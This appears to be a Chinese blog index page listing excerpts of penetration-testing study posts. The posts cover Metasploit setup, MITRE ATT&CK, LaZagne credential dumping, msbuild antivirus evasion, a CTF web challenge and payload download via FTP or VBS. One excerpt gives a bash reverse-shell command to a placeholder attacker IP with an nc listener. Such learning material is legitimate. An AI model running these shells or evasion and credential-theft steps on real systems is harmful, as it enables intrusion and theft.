環境 root運行 ubuntu18.04 騰訊雲服務器 控制面板上面所有的端口全部放行 本機自帶防火牆已拆 拆牆是為了能msf接受到會話 安裝 別人寫好的sh ...

最近准備學習一下關於ATT&CK的知識，這里面先來理解一下什么是ATT&CK(通過對ATT&CK的學習，可以很快的對安全領域有一個比較全面的認識)。 什么是MITRE MI ...

使用laZagne來抓取密碼 什么是laZagne呢，它是一個Pythono編寫的一個很強大的密碼抓取工具，有名的工具比如mimikatz，但是只能限於windwos情況下進行抓取，並且對於免殺方面 ...

免殺學習之使用msbuild來執行payload 什么是msbuild msbuild是Microsoft和Visual Studio的生成系統，簡單地說，這個就是用來編譯你的項目，也就是所謂的編 ...

easy calc 這次的比賽自己一題都沒有做出來，賽后看題解的時候很難受，其實有很多東西自己其實是可以做出來的，但是思路被限制了，可能這就是菜吧。 首先web題目就是一個easy calc，em ...

linux自帶的bash反彈shell 在攻擊機行執行 nc -lvvp 12345 來監聽端口 在目標機上執行bash -i >& /dev/tcp/攻擊機IP/12345 0& ...

利用ftp來下載payload文件 后記:這個我沒有實驗成功太菜了 利用vbs來下載payload 后記:這個已經利用成功了，網上說可以用script來執行，可能win10上面沒有，但是 ...